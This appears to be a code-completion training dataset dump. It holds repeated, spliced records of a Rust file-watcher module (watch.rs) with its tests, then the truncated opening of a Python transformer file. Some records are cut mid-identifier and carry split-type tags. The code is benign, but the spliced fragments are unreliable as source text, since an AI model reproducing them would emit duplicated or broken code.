Some(Err(EventError::EventHasNoFilePath(event)))
} else {
let notify::Event { paths, kind, .. } = event;
let interesting_paths: Vec<PathBuf> = paths
.into_iter()
.filter(|p| self.path_is_interesting(p, &kind))
.collect();
if !interesting_paths.is_empty() {
Some(Ok(Reason::FilesChanged(interesting_paths)))
} else {
None
}
}
}
}
}
/// Extend the watch list with an additional list of paths.
/// Note: Watch maintains a list of already watched paths, and
/// will not add duplicates.
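///
/// Illustrative usage (hypothetical paths; a rough sketch, not a test):
///
/// ```ignore
/// let mut watch = Watch::try_new()?;
/// watch.extend(vec![PathBuf::from("/project/shell.nix")])?;
/// // extending with the same path again is a no-op thanks to the de-duplication
/// watch.extend(vec![PathBuf::from("/project/shell.nix")])?;
/// ```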
pub fn extend(&mut self, paths: Vec<PathBuf>) -> Result<(), notify::Error> {
for path in paths {
let recursive_paths = walk_path_topo(path)?;
for p in recursive_paths {
let p = p.canonicalize()?;
match Self::extend_filter(p) {
Err(FilteredOut { reason, path }) => {
debug!("Skipping watching {}: {}", path.display(), reason)
}
Ok(p) => {
self.add_path(p)?;
}
}
}
}
Ok(())
}
fn extend_filter(path: PathBuf) -> Result<PathBuf, FilteredOut<'static>> {
if path.starts_with(Path::new("/nix/store")) {
Err(FilteredOut {
path,
reason: "starts with /nix/store",
})
} else {
Ok(path)
}
}
fn log_event(&self, event: ¬ify::Event) {
debug!("Watch Event: {:#?}", event);
match &event.kind {
notify::event::EventKind::Remove(_) if !event.paths.is_empty() => {
info!("identified removal: {:?}", &event.paths);
}
_ => {
debug!("watch event"; "event" => ?event);
}
}
}
fn add_path(&mut self, path: PathBuf) -> Result<(), notify::Error> {
if !self.watches.contains(&path) {
debug!("watching path"; "path" => path.to_str());
self.notify.watch(&path, RecursiveMode::NonRecursive)?;
self.watches.insert(path.clone());
}
if let Some(parent) = path.parent() {
if !self.watches.contains(parent) {
debug!("watching parent path"; "parent_path" => parent.to_str());
self.notify.watch(&parent, RecursiveMode::NonRecursive)?;
}
}
Ok(())
}
fn path_is_interesting(&self, path: &PathBuf, kind: &EventKind) -> bool {
path_match(&self.watches, path)
&& match kind {
// We ignore metadata modification events for the profiles directory
// tree as it is a symlink forest that is used to keep track of
// channels and nix will unconditionally update the metadata of each
// link in this forest. See https://github.com/NixOS/nix/blob/629b9b0049363e091b76b7f60a8357d9f94733cc/src/libstore/local-store.cc#L74-L80
// for the unconditional update. These metadata modification events are
// spurious and they can easily cause a rebuild-loop when a shell.nix
// file does not pin its version of nixpkgs or other channels. When
// a Nix channel is updated we receive many other types of events, so
// ignoring these metadata modifications will not impact lorri's
// ability to correctly watch for channel changes.
EventKind::Modify(ModifyKind::Metadata(_)) => {
if path.starts_with(Path::new("/nix/var/nix/profiles/per-user")) {
debug!("ignoring spurious metadata change event within the profiles dir"; "path" => path.to_str());
false
} else {
true
}
}
_ => true,
}
}
}
/// Lists the dirs and files in a directory, as two vectors.
/// Given path must be a readable directory.
fn list_dir(dir: &Path) -> Result<(Vec<PathBuf>, Vec<PathBuf>), std::io::Error> {
let mut dirs = vec![];
let mut files = vec![];
for entry in std::fs::read_dir(dir)? {
let entry = entry?;
if entry.file_type()?.is_dir() {
dirs.push(entry.path())
} else {
files.push(entry.path())
}
}
Ok((dirs, files))
}
/// List all children of the given path.
/// Recurses into directories.
///
/// Returns the given path first, then a topologically sorted list of children, if any.
///
/// All files have to be readable, or the function aborts.
/// TODO: gracefully skip unreadable files.
fn walk_path_topo(path: PathBuf) -> Result<Vec<PathBuf>, std::io::Error> {
// push our own path first
let mut res = vec![path.clone()];
// nothing to list
if !path.is_dir() {
return Ok(res);
}
let (dirs, mut files) = list_dir(&path)?;
// plain files
res.append(&mut files);
// now go through the list, appending new
// directories to the work queue as you find them.
let mut work = std::collections::VecDeque::from(dirs);
loop {
match work.pop_front() {
// no directories remaining
None => break,
Some(dir) => {
res.push(dir.clone());
let (dirs, mut files) = list_dir(&dir)?;
res.append(&mut files);
work.append(&mut std::collections::VecDeque::from(dirs));
}
}
}
Ok(res)
}
/// Determine if the event path is covered by our list of watched
/// paths.
///
/// Returns true if:
/// - the event's path directly names a path in our
/// watch list
/// - the event's path names a canonicalized path in our watch list
/// - the event's path's parent directly names a path in our watch
/// list
/// - the event's path's parent names a canonicalized path in our
/// watch list
fn path_match(watched_paths: &HashSet<PathBuf>, event_path: &Path) -> bool {
let event_parent = event_path.parent();
let matches = |watched: &Path| {
if event_path == watched {
debug!(
"event path directly matches watched path";
"event_path" => event_path.to_str());
return true;
}
if let Some(parent) = event_parent {
if parent == watched {
debug!(
"event path parent matches watched path";
"event_path" => event_path.to_str(), "parent_path" => parent.to_str());
return true;
}
}
false
};
watched_paths.iter().any(|watched| {
if matches(watched) {
return true;
}
if let Ok(canonicalized_watch) = watched.canonicalize() {
if matches(&canonicalized_watch) {
return true;
}
}
false
})
}
#[cfg(test)]
mod tests {
use super::{EventError, Reason, Watch};
use crate::bash::expect_bash;
use std::path::PathBuf;
use std::thread::sleep;
use std::time::Duration;
use tempfile::tempdir;
/// upper bound on how long the watcher may take to deliver events (if it’s hit, something is broken)
fn upper_watcher_timeout() -> Duration {
// CI machines are very slow sometimes.
Duration::from_millis(1000)
}
/// Collect all notifications
fn process_all(watch: &Watch) -> Vec<Option<Result<Reason, EventError>>> {
watch.rx.try_iter().map(|e| watch.process(e)).collect()
}
/// Returns true iff the given file has changed
fn file_changed(watch: &Watch, file_name: &str) -> (bool, Vec<Reason>) {
let mut reasons = Vec::new();
let mut changed = false;
for event in process_all(watch) {
if let Some(Ok(reason)) = event {
reasons.push(reason.clone());
if let Reason::FilesChanged(files) = reason {
changed = changed
|| files
.iter()
.map(|p| p.file_name())
.filter(|f| f.is_some())
.map(|f| f.unwrap())
.any(|f| f == file_name)
}
}
}
(changed, reasons)
}
fn assert_file_changed(watch: &Watch, file_name: &str) {
let (file_changed, events) = file_changed(watch, file_name);
assert!(
file_changed,
"no file change notification for '{}'; these events occurred instead: {:?}",
file_name, events
);
}
/// Returns true iff there were no changes
fn no_changes(watch: &Watch) -> bool {
process_all(watch).iter().filter(|e| e.is_some()).count() == 0
}
#[cfg(target_os = "macos")]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// Sometimes a brand new watch will send a CREATE notification
// for a file which was just created, even if the watch was
// created after the file was made.
//
// Our tests want to be very precise about which events are
// received when, so expect these initial events and swallow
// them.
//
// Note, this is racy in the kernel. Otherwise I'd assert
// this is empty.
sleep(upper_watcher_timeout());
process_all(watcher).is_empty();
}
#[cfg(not(target_os = "macos"))]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// If we're supposedly dealing with a late notification on
// macOS, we'd better not receive any messages on other
// platforms.
//
// If we do receive any notifications, our test is broken.
sleep(upper_watcher_timeout());
assert!(process_all(watcher).is_empty());
}
#[test]
fn trivial_watch_whole_directory() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().to_path_buf()]).unwrap();
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn trivial_watch_specific_file() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn rename_over_vim() {
// Vim renames files into place for atomic writes
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap(); | macos_eat_late_notifications(&mut watcher);
// bar is not watched, expect error
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
// Do it a second time
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn walk_path_topo_filetree() -> std::io::Result<()> {
let temp = tempdir().unwrap();
let files = vec![("a", "b"), ("a", "c"), ("a/d", "e"), ("x/y", "z")];
for (dir, file) in files {
std::fs::create_dir_all(temp.path().join(dir))?;
std::fs::write(temp.path().join(dir).join(file), [])?;
}
let res = super::walk_path_topo(temp.path().to_owned())?;
// check that the list is topologically sorted
// by making sure *no* later path is a prefix of a previous path.
let mut inv = res.clone();
inv.reverse();
for i in 0..inv.len() {
for predecessor in inv.iter().skip(i + 1) {
assert!(
!predecessor.starts_with(&inv[i]),
"{:?} is a prefix of {:?}, even though it comes later in list, thus topological order is not given!\nFull list: {:#?}",
inv[i], predecessor, res
)
}
}
// make sure the resulting list contains the same
// paths as the original list.
let mut res2 = res.clone();
res2.sort();
let mut all_paths = vec![
// our given path first
"", "a", // direct files come before nested directories
"a/b", "a/c", "x", "a/d", "a/d/e", "x/y", "x/y/z",
]
.iter()
.map(|p| temp.path().join(p).to_owned())
.collect::<Vec<_>>();
all_paths.sort();
assert_eq!(res2, all_paths);
Ok(())
}
#[test]
fn extend_filter() {
let nix = PathBuf::from("/nix/store/njlavpa90laywf22b1myif5101qhln8r-hello-2.10");
match super::Watch::extend_filter(nix.clone()) {
Ok(path) => assert!(false, "{:?} should be filtered!", path),
Err(super::FilteredOut { path, reason }) => {
drop(reason);
assert_eq!(path, nix)
}
}
let other = PathBuf::from("/home/foo/project/foobar.nix");
assert_eq!(super::Watch::extend_filter(other.clone()), Ok(other));
}
} | random_line_split |
|
watch.rs | //! Recursively watch paths for changes, in an extensible and
//! cross-platform way.
use crate::NixFile;
use crossbeam_channel as chan;
use notify::event::ModifyKind;
use notify::{EventKind, RecommendedWatcher, RecursiveMode, Watcher};
use slog_scope::{debug, info};
use std::collections::HashSet;
use std::path::{Path, PathBuf};
use std::time::Duration;
/// A dynamic list of paths to watch for changes, and
/// react to changes when they occur.
pub struct Watch {
/// Event receiver. Process using `Watch::process`.
pub rx: chan::Receiver<notify::Result<notify::Event>>,
notify: RecommendedWatcher,
watches: HashSet<PathBuf>,
}
/// A debug message string that can only be displayed via `Debug`.
#[derive(Clone, Debug, Serialize)]
pub struct DebugMessage(pub String);
#[derive(Debug, PartialEq, Eq)]
struct FilteredOut<'a> {
reason: &'a str,
path: PathBuf,
}
/// Description of the project change that triggered a build.
#[derive(Clone, Debug, Serialize)]
#[serde(rename_all = "snake_case")]
pub enum Reason {
/// When a project is presented to Lorri to track, it's built for this reason.
ProjectAdded(NixFile),
/// When a ping is received.
PingReceived,
/// When there is a filesystem change, the first changed file is recorded,
/// along with a count of other filesystem events.
FilesChanged(Vec<PathBuf>),
/// When the underlying notifier reports something strange.
UnknownEvent(DebugMessage),
}
/// We weren’t able to understand a `notify::Event`.
#[derive(Clone, Debug)]
pub enum EventError {
/// No message was received from the raw event channel
RxNoEventReceived,
/// The changed file event had no file path
EventHasNoFilePath(notify::Event),
}
impl Watch {
/// Instantiate a new Watch.
pub fn try_new() -> Result<Watch, notify::Error> {
let (tx, rx) = chan::unbounded();
Ok(Watch {
notify: Watcher::new(tx, Duration::from_millis(100))?,
watches: HashSet::new(),
rx,
})
}
/// Process `notify::Event`s coming in via `Watch::rx`.
///
/// `None` if there were no relevant changes.
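///
/// Illustrative receive loop (sketch only; error handling elided):
///
/// ```ignore
/// for event in watch.rx.try_iter() {
///     match watch.process(event) {
///         Some(Ok(reason)) => println!("would rebuild because of {:?}", reason),
///         Some(Err(err)) => println!("unusable event: {:?}", err),
///         None => {} // nothing we watch was affected
///     }
/// }
/// ```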
pub fn process(
&self,
event: notify::Result<notify::Event>,
) -> Option<Result<Reason, EventError>> {
match event {
Err(err) => panic!("notify error: {}", err),
Ok(event) => {
self.log_event(&event);
if event.paths.is_empty() {
Some(Err(EventError::EventHasNoFilePath(event)))
} else {
let notify::Event { paths, kind, .. } = event;
let interesting_paths: Vec<PathBuf> = paths
.into_iter()
.filter(|p| self.path_is_interesting(p, &kind))
.collect();
if !interesting_paths.is_empty() {
Some(Ok(Reason::FilesChanged(interesting_paths)))
} else {
None
}
}
}
}
}
/// Extend the watch list with an additional list of paths.
/// Note: Watch maintains a list of already watched paths, and
/// will not add duplicates.
pub fn extend(&mut self, paths: Vec<PathBuf>) -> Result<(), notify::Error> {
for path in paths {
let recursive_paths = walk_path_topo(path)?;
for p in recursive_paths {
let p = p.canonicalize()?;
match Self::extend_filter(p) {
Err(FilteredOut { reason, path }) => {
debug!("Skipping watching {}: {}", path.display(), reason)
}
Ok(p) => {
self.add_path(p)?;
}
}
}
}
Ok(())
}
fn ex | ath: PathBuf) -> Result<PathBuf, FilteredOut<'static>> {
if path.starts_with(Path::new("/nix/store")) {
Err(FilteredOut {
path,
reason: "starts with /nix/store",
})
} else {
Ok(path)
}
}
fn log_event(&self, event: ¬ify::Event) {
debug!("Watch Event: {:#?}", event);
match &event.kind {
notify::event::EventKind::Remove(_) if !event.paths.is_empty() => {
info!("identified removal: {:?}", &event.paths);
}
_ => {
debug!("watch event"; "event" => ?event);
}
}
}
fn add_path(&mut self, path: PathBuf) -> Result<(), notify::Error> {
if !self.watches.contains(&path) {
debug!("watching path"; "path" => path.to_str());
self.notify.watch(&path, RecursiveMode::NonRecursive)?;
self.watches.insert(path.clone());
}
if let Some(parent) = path.parent() {
if !self.watches.contains(parent) {
debug!("watching parent path"; "parent_path" => parent.to_str());
self.notify.watch(&parent, RecursiveMode::NonRecursive)?;
}
}
Ok(())
}
fn path_is_interesting(&self, path: &PathBuf, kind: &EventKind) -> bool {
path_match(&self.watches, path)
&& match kind {
// We ignore metadata modification events for the profiles directory
// tree as it is a symlink forest that is used to keep track of
// channels and nix will unconditionally update the metadata of each
// link in this forest. See https://github.com/NixOS/nix/blob/629b9b0049363e091b76b7f60a8357d9f94733cc/src/libstore/local-store.cc#L74-L80
// for the unconditional update. These metadata modification events are
// spurious and they can easily cause a rebuild-loop when a shell.nix
// file does not pin its version of nixpkgs or other channels. When
// a Nix channel is updated we receive many other types of events, so
// ignoring these metadata modifications will not impact lorri's
// ability to correctly watch for channel changes.
EventKind::Modify(ModifyKind::Metadata(_)) => {
if path.starts_with(Path::new("/nix/var/nix/profiles/per-user")) {
debug!("ignoring spurious metadata change event within the profiles dir"; "path" => path.to_str());
false
} else {
true
}
}
_ => true,
}
}
}
/// Lists the dirs and files in a directory, as two vectors.
/// Given path must be a readable directory.
fn list_dir(dir: &Path) -> Result<(Vec<PathBuf>, Vec<PathBuf>), std::io::Error> {
let mut dirs = vec![];
let mut files = vec![];
for entry in std::fs::read_dir(dir)? {
let entry = entry?;
if entry.file_type()?.is_dir() {
dirs.push(entry.path())
} else {
files.push(entry.path())
}
}
Ok((dirs, files))
}
/// List all children of the given path.
/// Recurses into directories.
///
/// Returns the given path first, then a topologically sorted list of children, if any.
///
/// All files have to be readable, or the function aborts.
/// TODO: gracefully skip unreadable files.
fn walk_path_topo(path: PathBuf) -> Result<Vec<PathBuf>, std::io::Error> {
// push our own path first
let mut res = vec![path.clone()];
// nothing to list
if !path.is_dir() {
return Ok(res);
}
let (dirs, mut files) = list_dir(&path)?;
// plain files
res.append(&mut files);
// now go through the list, appending new
// directories to the work queue as you find them.
let mut work = std::collections::VecDeque::from(dirs);
loop {
match work.pop_front() {
// no directories remaining
None => break,
Some(dir) => {
res.push(dir.clone());
let (dirs, mut files) = list_dir(&dir)?;
res.append(&mut files);
work.append(&mut std::collections::VecDeque::from(dirs));
}
}
}
Ok(res)
}
/// Determine if the event path is covered by our list of watched
/// paths.
///
/// Returns true if:
/// - the event's path directly names a path in our
/// watch list
/// - the event's path names a canonicalized path in our watch list
/// - the event's path's parent directly names a path in our watch
/// list
/// - the event's path's parent names a canonicalized path in our
/// watch list
fn path_match(watched_paths: &HashSet<PathBuf>, event_path: &Path) -> bool {
let event_parent = event_path.parent();
let matches = |watched: &Path| {
if event_path == watched {
debug!(
"event path directly matches watched path";
"event_path" => event_path.to_str());
return true;
}
if let Some(parent) = event_parent {
if parent == watched {
debug!(
"event path parent matches watched path";
"event_path" => event_path.to_str(), "parent_path" => parent.to_str());
return true;
}
}
false
};
watched_paths.iter().any(|watched| {
if matches(watched) {
return true;
}
if let Ok(canonicalized_watch) = watched.canonicalize() {
if matches(&canonicalized_watch) {
return true;
}
}
false
})
}
#[cfg(test)]
mod tests {
use super::{EventError, Reason, Watch};
use crate::bash::expect_bash;
use std::path::PathBuf;
use std::thread::sleep;
use std::time::Duration;
use tempfile::tempdir;
/// upper bound on how long the watcher may take to deliver events (if it’s hit, something is broken)
fn upper_watcher_timeout() -> Duration {
// CI machines are very slow sometimes.
Duration::from_millis(1000)
}
/// Collect all notifications
fn process_all(watch: &Watch) -> Vec<Option<Result<Reason, EventError>>> {
watch.rx.try_iter().map(|e| watch.process(e)).collect()
}
/// Returns true iff the given file has changed
fn file_changed(watch: &Watch, file_name: &str) -> (bool, Vec<Reason>) {
let mut reasons = Vec::new();
let mut changed = false;
for event in process_all(watch) {
if let Some(Ok(reason)) = event {
reasons.push(reason.clone());
if let Reason::FilesChanged(files) = reason {
changed = changed
|| files
.iter()
.map(|p| p.file_name())
.filter(|f| f.is_some())
.map(|f| f.unwrap())
.any(|f| f == file_name)
}
}
}
(changed, reasons)
}
fn assert_file_changed(watch: &Watch, file_name: &str) {
let (file_changed, events) = file_changed(watch, file_name);
assert!(
file_changed,
"no file change notification for '{}'; these events occurred instead: {:?}",
file_name, events
);
}
/// Returns true iff there were no changes
fn no_changes(watch: &Watch) -> bool {
process_all(watch).iter().filter(|e| e.is_some()).count() == 0
}
#[cfg(target_os = "macos")]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// Sometimes a brand new watch will send a CREATE notification
// for a file which was just created, even if the watch was
// created after the file was made.
//
// Our tests want to be very precise about which events are
// received when, so expect these initial events and swallow
// them.
//
// Note, this is racy in the kernel. Otherwise I'd assert
// this is empty.
sleep(upper_watcher_timeout());
process_all(watcher).is_empty();
}
#[cfg(not(target_os = "macos"))]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// If we're supposedly dealing with a late notification on
// macOS, we'd better not receive any messages on other
// platforms.
//
// If we do receive any notifications, our test is broken.
sleep(upper_watcher_timeout());
assert!(process_all(watcher).is_empty());
}
#[test]
fn trivial_watch_whole_directory() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().to_path_buf()]).unwrap();
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn trivial_watch_specific_file() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn rename_over_vim() {
// Vim renames files into place for atomic writes
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
// bar is not watched, expect error
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
// Do it a second time
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn walk_path_topo_filetree() -> std::io::Result<()> {
let temp = tempdir().unwrap();
let files = vec![("a", "b"), ("a", "c"), ("a/d", "e"), ("x/y", "z")];
for (dir, file) in files {
std::fs::create_dir_all(temp.path().join(dir))?;
std::fs::write(temp.path().join(dir).join(file), [])?;
}
let res = super::walk_path_topo(temp.path().to_owned())?;
// check that the list is topologically sorted
// by making sure *no* later path is a prefix of a previous path.
let mut inv = res.clone();
inv.reverse();
for i in 0..inv.len() {
for predecessor in inv.iter().skip(i + 1) {
assert!(
!predecessor.starts_with(&inv[i]),
"{:?} is a prefix of {:?}, even though it comes later in list, thus topological order is not given!\nFull list: {:#?}",
inv[i], predecessor, res
)
}
}
// make sure the resulting list contains the same
// paths as the original list.
let mut res2 = res.clone();
res2.sort();
let mut all_paths = vec![
// our given path first
"", "a", // direct files come before nested directories
"a/b", "a/c", "x", "a/d", "a/d/e", "x/y", "x/y/z",
]
.iter()
.map(|p| temp.path().join(p).to_owned())
.collect::<Vec<_>>();
all_paths.sort();
assert_eq!(res2, all_paths);
Ok(())
}
#[test]
fn extend_filter() {
let nix = PathBuf::from("/nix/store/njlavpa90laywf22b1myif5101qhln8r-hello-2.10");
match super::Watch::extend_filter(nix.clone()) {
Ok(path) => assert!(false, "{:?} should be filtered!", path),
Err(super::FilteredOut { path, reason }) => {
drop(reason);
assert_eq!(path, nix)
}
}
let other = PathBuf::from("/home/foo/project/foobar.nix");
assert_eq!(super::Watch::extend_filter(other.clone()), Ok(other));
}
}
| tend_filter(p | identifier_name |
transformer.py | from collections import deque
from collections.abc import Iterable
from functools import partial
from itertools import islice, cycle
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange
from dalle_pytorch.reversible import ReversibleSequence, SequentialSequence
from dalle_pytorch.attention import Attention, SparseAttention, SparseConvCausalAttention, SparseAxialCausalAttention
from rotary_embedding_torch import RotaryEmbedding, broadcat
# helpers
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d
def cast_tuple(val, depth = 1):
return val if isinstance(val, Iterable) else (val,) * depth
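# For instance (illustrative): cast_tuple(False, 3) -> (False, False, False), while a tuple such as
# ('full', 'axial_row') is returned unchanged. Note that a bare string counts as Iterable here,
# so it is also returned as-is rather than repeated.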
# classes
class DivideMax(nn.Module):
def __init__(self, dim):
super().__init__()
self.dim = dim
def forward(self, x):
maxes = x.amax(dim = self.dim, keepdim = True).detach()
return x / maxes
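# Illustrative effect (hypothetical numbers): with dim = -1, a row [2.0, 4.0] becomes [0.5, 1.0];
# the divisor is detached, so no gradient flows through the max itself.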
class NonCached(nn.Module):
"""
A wrapper for layers that don't support the inference cache themselves.
Reconstructs the full sequence before the layer and
cuts the suffix of the outputs after the layer.
"""
def __init__(self, fn):
super().__init__()
self.fn = fn
def forward(self, x, *, cache = None, cache_key = None, **kwargs):
n = x.shape[-2]
if exists(cache):
if cache_key in cache:
x = torch.cat([cache[cache_key], x], dim=-2)
cache[cache_key] = x
out = self.fn(x, **kwargs)
return out[:, -n:]
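# Hypothetical usage sketch: wrap any attention layer that cannot consume the inference cache,
# e.g. attn = NonCached(some_sparse_attention_layer). During incremental decoding the wrapper
# re-assembles the full sequence from cache[cache_key] before calling the layer and then keeps
# only the newly generated suffix of its output.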
class CachedAs(nn.Module):
"""
A wrapper that defines a key for the inference cache.
"""
def __init__(self, cache_key, fn):
super().__init__()
self.cache_key = cache_key
self.fn = fn
def forward(self, x, *, cache=None, **kwargs):
return self.fn(x, cache=cache, cache_key=self.cache_key, **kwargs)
# https://arxiv.org/abs/2103.17239
class LayerScale(nn.Module):
def __init__(self, dim, depth, fn):
super().__init__()
if depth <= 18:
init_eps = 0.1
elif depth > 18 and depth <= 24:
init_eps = 1e-5
else:
init_eps = 1e-6
scale = torch.zeros(1, 1, dim).fill_(init_eps)
self.scale = nn.Parameter(scale)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(x, **kwargs) * self.scale
# layer norm
class PreNorm(nn.Module):
def __init__(self, dim, fn, sandwich = False):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.norm_out = nn.LayerNorm(dim) if sandwich else nn.Identity()
self.fn = fn
def forward(self, x, **kwargs):
x = self.norm(x)
x = self.fn(x, **kwargs)
return self.norm_out(x)
# feed forward
class GEGLU(nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, dropout = 0., mult = 4.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x, cache=None, cache_key=None):
return self.net(x)
# token shift classes
class PreShiftToken(nn.Module):
def __init__(self, fn, image_size, seq_len):
super().__init__()
self.fn = fn
self.image_size = image_size
self.seq_len = seq_len
self.img_seq_len = image_size ** 2
self.text_len = seq_len - self.img_seq_len + 1
def forward(self, x, cache=None, cache_key=None, **kwargs):
seq_len, image_size, text_len = self.seq_len, self.image_size, self.text_len
if exists(cache) and cache_key in cache:
offset = cache['offset']
assert offset >= text_len, "cached inference for text is not supported"
q = cache[cache_key]
assert isinstance(q, deque) and len(q) == image_size
x_top, x_left, *x_pass = x[:, -1].chunk(4, dim=-1)
q.append((x_top, x_left))
x_top = q.popleft()[0]
x_left = q[-2][1]
if (offset - text_len) % image_size == 0:
x_left = torch.zeros_like(x_left)
x = torch.cat((x_top, x_left, *x_pass), dim=-1)
return self.fn(x[:, None], cache=cache, **kwargs)
n = x.shape[1]
padding = seq_len - n + 1
# if sequence is shorter than the text length, no image tokens to shift
if n < text_len:
return self.fn(x, **kwargs)
# get text and image tokens
x_text, x_img = x[:, :text_len], x[:, text_len:]
x_img = F.pad(x_img, (0, 0, 0, padding))
x_img = rearrange(x_img, 'b (h w) d -> b h w d', h = image_size)
# shift 1 from the left for text tokens
x_text_shift, x_text_pass = x_text.chunk(2, dim = -1)
x_text_shift = F.pad(x_text_shift, (0, 0, 1, -1))
x_text = torch.cat((x_text_shift, x_text_pass), dim = -1)
# shift from top, left for image tokens
x_img_shift_top, x_img_shift_left, *x_img_pass = x_img.chunk(4, dim = -1)
x_img_shift_left = F.pad(x_img_shift_left, (0, 0, 1, -1))
x_img_shift_top = F.pad(x_img_shift_top, (0, 0, 0, 0, 1, -1))
x_img = torch.cat((x_img_shift_top, x_img_shift_left, *x_img_pass), dim = -1)
# merge text and image sequence back together
x_img = rearrange(x_img, 'b h w d -> b (h w) d')
x_img = x_img[:, :-padding]
x = torch.cat((x_text, x_img), dim = 1)
if exists(cache):
dummy_top, dummy_left, *_ = x[:, -1].chunk(4, dim=-1)
dummy_top, dummy_left = torch.zeros_like(dummy_top), torch.zeros_like(dummy_left)
q = deque()
x_img = x_img[:, -image_size:]
for _ in range(image_size - x_img.shape[1]):
q.append((dummy_top, dummy_left))
for i in range(x_img.shape[1]):
q.append(x_img[:, i].chunk(4, dim=-1)[:2])
cache[cache_key] = q
return self.fn(x, cache=cache, **kwargs)
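# Rough intuition for the shift above (descriptive sketch): an image token at grid position (r, c)
# replaces its first quarter of channels with those of the token at (r - 1, c) and its second
# quarter with those of the token at (r, c - 1); a text token borrows its first half of channels
# from the previous text token. The remaining channels pass through untouched.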
# main transformer class
class Transformer(nn.Module):
def __init__(
self,
*,
dim,
depth,
seq_len,
reversible = False,
causal = True,
heads = 8,
dim_head = 64,
ff_mult = 4,
attn_dropout = 0.,
ff_dropout = 0.,
attn_types = None,
image_fmap_size = None,
sparse_attn = False,
stable = False,
sandwich_norm = False,
shift_tokens = False,
rotary_emb = True,
shared_attn_ids = None,
shared_ff_ids = None,
optimize_for_inference = False, # use cache-friendly masked attention instead of a sparse one
):
super().__init__()
layers = nn.ModuleList([])
sparse_layer = cast_tuple(sparse_attn, depth)
self.seq_len = seq_len
self.image_fmap_size = image_fmap_size
attn_types = default(attn_types, ('full',))
attn_types = cast_tuple(attn_types)
attn_type_layer = islice(cycle(attn_types), depth)
shared_attn_ids = cycle(default(shared_attn_ids, range(depth)))
shared_ff_ids = cycle(default(shared_ff_ids, range(depth)))
shared_attn_layers = {}
shared_ff_layers = {}
for (ind, sparse_attn, attn_type, attn_id, ff_id) in \
zip(range(depth), sparse_layer, attn_type_layer, shared_attn_ids, shared_ff_ids):
if attn_type == 'full':
attn_class = partial(Attention, stable = stable)
